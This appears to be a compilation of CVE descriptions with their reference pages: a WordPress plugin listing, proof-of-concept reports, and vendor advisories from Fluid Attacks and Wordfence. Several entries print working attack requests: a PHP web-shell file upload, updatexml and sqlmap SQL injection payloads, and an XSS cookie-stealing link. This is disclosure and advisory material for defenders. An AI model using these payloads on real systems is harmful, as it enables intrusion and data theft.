A vulnerability classified as critical has been found in SourceCodester Sanitization Management System. Affected is an unknown function of the file /php-sms/classes/Master.php?f=save_quote. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213012.

CVE-2022-3868

Auth. (admin+) Cross-Site Scripting (XSS) vulnerability in Stage Rock Convert plugin <= 2.11.0 on WordPress.

*   Details
*   Reviews
*   Support
*   Development

Publique banners no seu blog de maneira rápida e efetiva, e converta visitantes em subscribers, leads ou clientes sem precisar entender código. Esses calls-to-action (CTAs) serão publicados diretamente do seu painel do WordPress e poderão ser monitorados através do Google Analytics.

**Adicione os banners em massa**

Seus posts estão sendo criados, mas você tem problemas quando o assunto é aumentar o número de conversões? Publique seus banners em todos os seus posts sem mexer diretamente no código.

**Organize de acordo com categorias**

Para facilitar, os banners podem ser organizados para serem apresentados de acordo com a categoria dos posts do seu blog. Assim fica fácil manter o controle sobre o que cada conteúdo irá apresentar.

**Personalize e obtenha melhores resultados**

Posicione o CTA dentro dos posts escolhendo entre o topo e o final do conteúdo, programe a data do lançamento e personalize as tags HTML para obter melhores resultados.

**Analise os resultados**

Insira UTMs (as tags de monitoramento padrão do Google) para monitorar os resultados diretamente no Google Analytics.

**Outras funcionalidades**

*   Compatível com SEO.
*   Compatível com qualquer versão do WordPress, sem a necessidade de customização de estilo (CSS).
*   Compatível com AMP.
*   Responsivo (funciona em qualquer dispositivo).
*   Disponível em inglês (en) e português (pt-br).
*   Clique aqui para ver exemplos online.

Avalie o plugin deixando uma classificação ou sugira novas features no fórum de suporte.

Feito com ❤ pelo time da Rock Content no #SanPedroValley.

Rock Convert will definitely save you some hours of manual work through enabling you to scale banner distribution across your blog and converting users to leads. If you download it, you will not regret!

As estatísticas pararam de funcionar. Testei direto no PHP e direto no texto também, mas não contabiliza mais. Utilizo o plugin há tempos e funcionava. Estou usando a versão 2.9.5.

Instalei pois necessitava de uma caixa de captura para newsletter. A caixa é a com o melhor design e a mais fácil de configurar entre todas as opções que vi (testei várias). Porém a mesma não funciona no site versão AMP. Uso o AMP oficial do Wordpress. Entrei em contato com o suporte e infelizmente também não conseguiram resolver. Sá não tirei ainda do meu site, pois os demais plugins de newsletter não me agradaram.

Gostei mas o plugin não está atualizado, só queria adicionar CTA de baixar o conteúdo em páginas e não artigos. Está causando erro quando atualiza a nova versão do WordPress.

Sou desenvolvedor e sempre instalo nos WP que faço. Com ele de maneira muito fácil você consegue colocar e partes estratégicas do site um action para sua LP e assim aumentar o número de leads

Ainda não experimentei pois o WP só permite instalação de plugins no plano pago(pago eu utilizo o Wix). Ou plano de hospedagem profissional, mas a princípio para uma forma de adSense da RockContent.

Read all 20 reviews

“Rock Convert” is open source software. The following people have contributed to this plugin.

Contributors

*    Rock Content

**3.0.0**

*   Revisão completa do plugin
*   Refatorado o código para melhor desempenho e segurança
*   Todas as variáveis e opções foram escapadas a fim de evitar ataques XSS
*   Refatoração baseada no WordPress Coding Standard

**2.11.0**

Correção:  
\* Corrigidos pontos de vulnerabilidade XSS  
\* Melhoria na semântica dos formulários da área administrativa  
\* Corrigida chamada a API Rest

**2.10.2**

Improvements:  
\* Improvements in the plugin security

**2.10.1**

Correção:  
\* Css which affected the theme fixed

**2.10.0**

Correção:  
\* Fix popup front

**2.9.9**

Correção:  
\* Fix query categories and layout admin

**2.9.8**

Correção:  
\* Correção do formulário de popup

**2.9.7**

Correção:  
\* Melhorias no layout do preview

**2.9.6**

Correção:  
\* Correção de chamada de função javascript  
\* Melhorias no layout do preview

**2.9.5**

Correção:  
\* Correção dos endpoints rest

**2.9.4**

Correção:  
\* Correção de css dos titulos do blog

**2.9.3**

Correção:  
\* Correção de versão do arquivo javascript

**2.9.2**

Correção:  
\* Correção de bug no campo de widget

**2.9.1**

Correção:  
\* Correção de bug no layout do admin

**2.9**

Novidades:  
\* Adição de nova funcionalidade de popup exit

**2.8.1**

Melhorias:  
\* Corrigida chamada rest  
\* Corrigida quebra de layout no painel

**2.8**

Novidades:  
\* Adicionado novos campos para o formulário do widget

**2.7.1**

Novidades:  
\* Adicionado painel para visualização das leads

**2.7.0**

Novidades:  
\* Suporte a tags  
\* Possibilidade de escolher regras de exibição mais refinadas

**2.2.0**

Novidades:  
\* Nova funcionalidade: Barra de anúncios no topo do site  
\* Nova funcionalidade: CTA customizavel na barra lateral

Melhorias:  
\* Altera separador ao exportar para arquivo CSV de ; para ,  
\* Permite alterar a mensagem de sucesso do widget Caixa de captura  
\* Permite alterar o titulo e o texto do botão na caixa de download

**2.1.4**

Melhorias:  
\* Adiciona suporte a event tracking para o Google Analytics  
\* Reduz o tamanho do script necessário para utilizar o Rock Convert

**2.1.3**

Correção:  
\* Previne que aconteça o Fatal Error na função get\_rest\_url

Melhorias:  
\* Previne que as visualizações dos CTAs sejam bloqueadas por plugins de cache

**2.1.2**

Melhorias:  
\* Permite cadastrar parametros customizados no link do CTA  
\* Adiciona suporte ao WordPress 5.0  
\* Adiciona formulário na página de configurações para se inscrever na newsletter do Rock Convert

**2.1**

Novas funcionalidades  
\* Adiciona Widget com caixa de captura de e-mails

**2.0.11**

Correção:  
\* Previne que o erro “Undefined index” aconteça ao mostrar banners na página do post

**2.0.0**

Melhorias:  
\* Visibilidade: Agora é possível escolher páginas onde um banner não deve aparecer;  
\* Shortcode: Todo banner tem um shortcode único que pode ser adicionado em qualquer posição de qualquer conteúdo;

Novas funcionalidades:  
\* Analytics: saiba como seus CTAs estão performando diretamente no painel do wordpress;  
\* Captura de leads: Disponibilize seus posts para download no formato PDF e capture os e-mails;  
\* Faça download dos leads no formato CSV

**1.0.0**

*   Permite criar CTAs
*   Permite selecionar as categorias onde o CTA deve aparecer
*   Permite selecionar a imagem do CTA
*   Permite selecionar onde o CTA deve aparecer (início ou fim do post)
*   Permite cadastrar as UTM Tags para o link

CVE-2022-36428: Rock Convert

Online Tours & Travels Management System v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /operations/travellers.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: YorkLee

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/travellers.php

Loophole location: Online Tours & Travels management system's add\_travellers.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /tour/admin/operations/travellers.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/add\_travellers.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------9453452924520
Content-Length: 1097
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-username"
hhhh
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-email"
11111111@qq.com
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-password"
$&@%bBHGu111
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-confirm-password"
$&@%bBHGu111
\-----------------------------9453452924520
Content-Disposition: form-data; name="state\_name"
Haryana
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-digits"
1888888888
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-suggestions"
11111
\-----------------------------9453452924520
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------9453452924520
Content-Disposition: form-data; name="submit"
\-----------------------------9453452924520--

The files will be uploaded to this directory \\tour\\admin\\img

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43061: Cve_report/RCE-1.md at main · YorkLee53645349/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_appointment.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Master.php?f=delete\_appointment

Vulnerability location: /odlms/classes/Master.php?f=delete\_appointment,id

dbname=odlms\_db,length=8

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Master.php?f\=delete\_appointment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=4'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43062: Cve_report/SQLi-1.md at main · YorkLee53645349/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Users.php?f=delete_client.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete\_client

Vulnerability location: /odlms/classes/Users.php?f=delete\_client,id

dbname=odlms\_db,length=8

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete\_client HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43063: Cve_report/SQLi-2.md at main · YorkLee53645349/Cve_report

CandidATS version 3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. This is possible because the application application does not properly validate user input against XSS attacks.

1.  Home
2.  Advisories
3.  Local File Read in CandidATS 3.0.0 via XXE

**Summary**

**Name**

Local File Read in CandidATS 3.0.0 via XXE

**Code name**

J.Cole

**Product**

CandidATS

**Affected versions**

Version 3.0.0

**State**

Public

**Release date**

2022-10-27

**Vulnerability**

**Kind**

XML injection (XXE)

**Rule**

083\. XML injection (XXE)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

**CVSSv3 Base Score**

6.5

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-42745

**Description**

CandidATS version 3.0.0 allows an external attacker to read arbitrary files from the server. This is possible because the application is vulnerable to XXE.

**Vulnerability**

The XXE present in CandidATS 3.0.0, allows an unauthenticated remote attacker to read arbitrary files from the server. To trigger this vulnerability, we will need to upload a malicious DOCX to the server.

**Exploitation**

In this attack we will be able to read arbitrary files from the server, through an XXE.

**Our security policy**

We have reserved the CVE-2022-42745 to refer to these issues from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: CandidATS 3.0.0
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://candidats.net/

**Timeline**

2022-10-11

Vulnerability discovered.

2022-10-11

Vendor contacted.

2022-10-11

Vendor replied acknowledging the report.

2022-10-27

Public Disclosure.

CVE-2022-42749: Local File Read in CandidATS 3.0.0 via XXE | Advisories | Fluid Attacks

SalonERP version 3.0.2 allows an external attacker to steal the cookie of arbitrary users. This is possible because the application does not correctly validate the page parameter against XSS attacks.

1.  Home
2.  Advisories
3.  SalonERP 3.0.2 XSS to Account Takeover

**Summary**

**Name**

SalonERP 3.0.2 - XSS to Account Takeover

**Code name**

Hardway

**Product**

SalonERP

**Affected versions**

Version 3.0.2

**State**

Public

**Release date**

2022-10-27

**Vulnerability**

**Kind**

Reflected cross-site scripting (XSS)

**Rule**

008\. Reflected cross-site scripting (XSS)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CVSSv3 Base Score**

8.8

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-42753

**Description**

SalonERP version 3.0.2 allows an external attacker to steal the cookie of arbitrary users. This is possible because the application does not correctly validate the page parameter against XSS attacks.

**Vulnerability**

The XSS present in SalonERP 3.0.2, allows an unauthenticated remote attacker to perform an Account Takeover. To trigger this vulnerability, we will need to send the following malicious link to an victim in order to hack their account:

    POST /try/backend.php HTTP/2
    Host: salonerp.sourceforge.io
    Cookie: salonerp-id=EnznqgZ8cAX2N7stbSLl; PHPSESSID=2f8c90c0e918726eed019427af65f438
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Origin: https://hacker.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 61
    
    what=settings<img+src=1+onerror="(alert)(document.cookie)" />
    

**Exploitation**

In this attack we will obtain the victim user account, through a malicious link.

**Our security policy**

We have reserved the CVE-2022-42753 to refer to these issues from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: SalonERP 3.0.2
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://salonerp.sourceforge.io/

**Timeline**

2022-10-13

Vulnerability discovered.

2022-10-13

Vendor contacted.

2022-10-13

Vendor replied acknowledging the report.

2022-10-27

Public Disclosure.

CVE-2022-42753: SalonERP 3.0.2 - XSS to Account Takeover | Advisories | Fluid Attacks

Emlog Pro v1.7.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability at /admin/store.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-43372: Reflected-XSS vulnerabilities via '/admin/store.php' #1  · Issue #195 · emlog/emlog

The VR Calendar plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.3. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to delete, and modify calendars as well as the plugin settings, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Wordfence is authorized by the Common Vulnerabilities and Exposures (CVE®) Program as a CNA, or CVE Numbering Authority. As a CNA, Wordfence assigns CVE IDs for new vulnerabilities in WordPress Core, WordPress Plugins and WordPress Themes.

Assigned CVE IDs and the vulnerability details are published below. For more information about submitting vulnerabilities to Wordfence for CVE ID assignment, please refer to our vulnerability disclosure policy.

This is a continuation of Vulnerability Advisories.

**VR Calendar <= 2.3.3 – Cross-Site Request Forgery**

**Affected Plugin:** VR Calendar  
**Plugin Slug:** vr-calendar-sync  
**Affected Versions:** <= 2.3.3  
**CVE ID:** CVE-2022-3852  
**CVSS Score:** 8.8 (High)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  
**Researcher/s:** Marco Wotschka  
**Fully Patched Version:** 2.3.4  
**Recommended Remediation:** Update to version 2.3.4, or newer.  
**Publication Date:** 2022-11-03

The VR Calendar plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.3. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to delete, and modify calendars as well as the plugin settings, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**Restaurant Menu – Food Ordering System – Table Reservation <= 2.3.0 – Missing Authorization on AJAX Actions**

The Restaurant Menu – Food Ordering System – Table Reservation plugin for WordPress is vulnerable to authorization bypass via several AJAX actions in versions up to, and including 2.3.0 due to missing capability checks and missing nonce validation. This makes it possible for authenticated attackers with minimal permissions to perform a wide variety of actions such as modifying the plugin’s settings and modifying the ordering system preferences.

**Restaurant Menu – Food Ordering System – Table Reservation <= 2.3.1 – Cross-Site Request Forgery**

The Restaurant Menu – Food Ordering System – Table Reservation plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.1. This is due to missing or incorrect nonce validation on several functions called via AJAX actions such as forms\_action, set\_option, & chosen\_options to name a few . This makes it possible for unauthenticated attackers to perform a variety of administrative actions like modifying forms, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**Ultimate Member – User Profile, User Registration, Login & Membership Plugin <= 2.5.0 – Authenticated (Admin+) Limited Remote Code Execution via um\_populate\_dropdown\_options**

The Ultimate Member plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.5.0 via the populate\_dropdown\_options function that accepts user supplied input and passes it through call\_user\_func(). This is restricted to non-parameter PHP functions like phpinfo(); since user supplied parameters are not passed through the function. This makes it possible for authenticated attackers, with administrative privileges, to execute code on the server.

**Ultimate Member – User Profile, User Registration, Login & Membership Plugin <= 2.5.0 – Authenticated (Admin+) Remote Code Execution via Multi-Select**

The Ultimate Member plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.5.0 via the get\_option\_value\_from\_callback function that accepts user supplied input and passes it through call\_user\_func(). This makes it possible for authenticated attackers, with administrative capabilities, to execute code on the server.

**Ultimate Member – User Profile, User Registration, Login & Membership Plugin <= 2.5.0 – Authenticated (Contributor+) Directory Traversal via Shortcodes**

The Ultimate Member plugin for WordPress is vulnerable to directory traversal in versions up to, and including 2.5.0 due to insufficient input validation on the ‘template’ attribute used in shortcodes. This makes it possible for attackers with administrative privileges to supply arbitrary paths using traversal (../../) to access and include files outside of the intended directory. If an attacker can successfully upload a php file then remote code execution via inclusion may also be possible. Note: for users with less than administrative capabilities, /wp-admin access needs to be enabled for that user in order for this to be exploitable by those users.

**Ultimate Member – User Profile, User Registration, Login & Membership Plugin <= 2.5.0 – Authenticated (Admin+) Directory Traversal**

The Ultimate Member plugin for WordPress is vulnerable to directory traversal in versions up to, and including 2.5.0 due to insufficient input validation on the ‘pack’ parameter. This makes it possible for attackers with administrative privileges to supply arbitrary paths using traversal (../../) to access and include files outside of the intended directory. If an attacker can successfully upload a file with the exact name ‘init.php’ then remote code execution may also be possible.

**Web Stories <= 1.24.0 – Server Side Request Forgery**

**Affected Plugin:** Web Stories  
**Plugin Slug:** web-stories  
**Affected Versions:** <= 1.24.0  
**CVE ID:** CVE-2022-3708  
**CVSS Score:** 9.6 (Critical)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N  
**Researcher/s:** Aymen Borgi  
**Fully Patched Version:** 1.25.0  
**Recommended Remediation:** Update to version 1.25.0, or newer.  
**Publication Date:** 2022-10-26

The Web Stories plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including 1.24.0 due to insufficient validation of URLs supplied via the ‘url’ parameter found via the /v1/hotlink/proxy REST API Endpoint. This made it possible for authenticated users to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

**ImageMagick Engine <= 1.7.4 – Cross-Site Request Forgery to Remote Command Execution**

**Affected Plugin:** ImageMagick Engine  
**Plugin Slug:** imagemagick-engine  
**Affected Versions:** <= 1.7.4  
**CVE ID:** CVE-2022-2441  
**CVSS Score:** 8.8 (High)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  
**Researcher/s:** Rasoul Jahanshahi  
**Fully Patched Version:** Unpatched.  
**Recommended Remediation:** Uninstall plugin from site until patched version available.  
**Publication Date:** 2022-10-17

The ImageMagick Engine plugin for WordPress is vulnerable to remote code execution via the ‘cli\_path’ parameter in versions up to, and including 1.7.4. This makes it possible for unauthenticated users to run arbitrary commands leading to remote command execution, granted they can trick a site administrator into performing an action such as clicking on a link. This makes it possible for an attacker to create and or modify files hosted on the server which can easily grant attackers backdoor access to the affected server.

**Log HTTP Requests <= 1.3.1 – Stored Cross-Site Scripting**

**Affected Plugin:** Log HTTP Requests  
**Plugin Slug:** log-http-requests  
**Affected Versions:** <= 1.3.1  
**CVE ID:** CVE-2022-3402  
**CVSS Score:** 6.1 (Medium)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
**Researcher/s:** Etan Imanol Castro Aldrete  
**Fully Patched Version:** 1.3.2  
**Recommended Remediation:** Update to version 1.3.2, or newer.  
**Publication Date:** 2022-10-05

The Log HTTP Requests plugin for WordPress is vulnerable to Stored Cross-Site Scripting via logged HTTP requests in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers who can trick a site’s administrator into performing an action like clicking on a link, or an authenticated user with access to a page that sends a request using user-supplied data via the server, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

**Bricks 1.2 – 1.5.3 – Remote Code Execution**

**Affected Theme:** Bricks  
**Theme Slug:** bricks  
**Affected Versions:** 1.2 to 1.5.3  
**CVE ID:** CVE-2022-3401  
**CVSS Score:** 8.8 (High)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Anonymous  
**Fully Patched Version:** 1.5.4  
**Recommended Remediation:** Update to version 1.5.4, or newer.  
**Publication Date:** 2022-10-03

The Bricks theme for WordPress is vulnerable to remote code execution due to the theme allowing site editors to include executable code blocks in website content in versions 1.2 to 1.5.3. This, combined with the missing authorization vulnerability (CVE-2022-3400), makes it possible for authenticated attackers with minimal permissions, such as a subscriber, can edit any page, post, or template on the vulnerable WordPress website and inject a code execution block that can be used to achieve remote code execution.

**Bricks 1.0 – 1.5.3 – Missing Authorization to Arbitrary Content Creation/Modification**

**Affected Theme:** Bricks  
**Theme Slug:** bricks  
**Affected Versions:** 1.0 – 1.5.3  
**CVE ID:** CVE-2022-3400  
**CVSS Score:** 6.5 (Medium)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N  
**Researcher/s:** Anonymous  
**Fully Patched Version:** 1.5.4  
**Recommended Remediation:** Update to version 1.5.4, or newer.  
**Publication Date:** 2022-10-03

The Bricks theme for WordPress is vulnerable to authorization bypass due to a missing capability check on the bricks\_save\_post AJAX action in versions 1.0 to 1.5.3. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to edit any page, post, or template on the vulnerable WordPress website.

CVE-2022-3852: Vulnerability Advisories Continued - Wordfence

MKCMS V6.2 has SQL injection via /ucenter/reg.php name parameter.

**0x00:Lead In**

> Source code can be downloaded  at  https://www.lanzous.com/ib7zwmh

This CMS is kinda funny, coz there is a universal filter addslashes  in /system/library.php

/system/library.php
<?php
...
if (!get\_magic\_quotes\_gpc()) {
    if (!empty($\_GET)) {        $\_GET \= addslashes\_deep($\_GET);    }    if (!empty($\_POST)) {        $\_POST \= addslashes\_deep($\_POST);    }    $\_COOKIE \= addslashes\_deep($\_COOKIE);    $\_REQUEST \= addslashes\_deep($\_REQUEST);
}
function addslashes\_deep($\_var\_0)
{
    if (empty($\_var\_0)) {        return $\_var\_0;    } else {        return is\_array($\_var\_0) ? array\_map('addslashes\_deep', $\_var\_0) : addslashes($\_var\_0);    }\_var\_0
}

While it uses stripslashes somewhere by mistake, let's do a global search about it, we get **3 SQL injections**  

**0x01:PreAuth SQL injection in /ucenter/repass.php**

MKCMS V6.2 has SQL injection via the /ucenter/repass.php _name_ parameter.

/ucenter/repass.php
<?php
...
if(isset($\_POST\['submit'\])){
$username \= stripslashes(trim($\_POST\['name'\]));
$email \= trim($\_POST\['email'\]);
$query \= mysql\_query("select u\_id from mkcms\_user where u\_name='$username' and u\_email='$email'");
  ...    

and it can be automated exploited by sqlmap namely

sqlmap -u http://localhost/ucenter/repass.php  --data "name=1&email\=1@1.com" -p name 
Parameter: name (POST)
    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=11' AND (SELECT 7672 FROM (SELECT(SLEEP(5)))NmRk) AND 'VTKx'='VTKx&email\=222@222.m&submit\=

And this can be tracked in 2019 via https://xz.aliyun.com/t/4189#toc-1  by CoolCat, so CVE request of this vuln won't belong to me, I just wanna enrich the CVE database.  

**0x02:PreAuth SQL injection in /ucenter/active.php**

MKCMS V6.2 has SQL injection via the /ucenter/active.php _verify_ parameter.

/ucenter/active.php
<?php
...
$verify \= stripslashes(trim($\_GET\['verify'\]));  
$nowtime \= time();
$query \= mysql\_query("select u\_id from mkcms\_user where u\_question='$verify'");
$row \= mysql\_fetch\_array($query);
...

Likewise, attackers can exploit it via sqlmap by typing  

sqlmap \-u http://localhost/ucenter/active.php?verify\=1 
Parameter: verify (GET)
    Type: time-based blind    Title: MySQL >\= 5.0.12 AND time-based blind (query SLEEP)    Payload: verify\=1' AND (SELECT 5656 FROM (SELECT(SLEEP(5)))xcPF) AND 'TRJq'='TRJq
    Type: UNION query    Title: Generic UNION query (NULL) \- 1 column    Payload: verify\=1' UNION ALL SELECT CONCAT(0x7171786b71,0x706d4e457048744251624653456d554a685a77654c66497a736d704c7454586462716f457a56587a,0x71707a7671)-- WUGv        

**0x03:PreAuth SQL injection in /ucenter/reg.php**

MKCMS V6.2 has SQL injection via the /ucenter/reg.php _name_ parameter.h

/ucenter/reg.php
<?php 
...
if(isset($\_POST\['submit'\])){
$username \= stripslashes(trim($\_POST\['name'\]));
$query \= mysql\_query("select u\_id from mkcms\_user where u\_name='$username'");
  ...

Again, sqlmap can be used to automate the exploitation  

sqlmap -u http://localhost/ucenter/reg.php  --data "name=1&submit\=1@1.com" -p name  
Parameter: name (POST)
    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: name=1' AND 2487=2487 AND 'WOhs'='WOhs&submit\=1@1.com
    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=1' AND (SELECT 6840 FROM (SELECT(SLEEP(5)))rygh) AND 'eoEE'='eoEE&submit\=1@1.com

**0x04:Mitigation**

remove the ​stripslashes() before the POST/GET param, thus we can't exploit it unless the coding of MYSQL is GBK/GB2312, i.e._wide byte sql injection._

(In my opinion,  is there any need to escape the name? it has never been allowed at all !

Tag

#php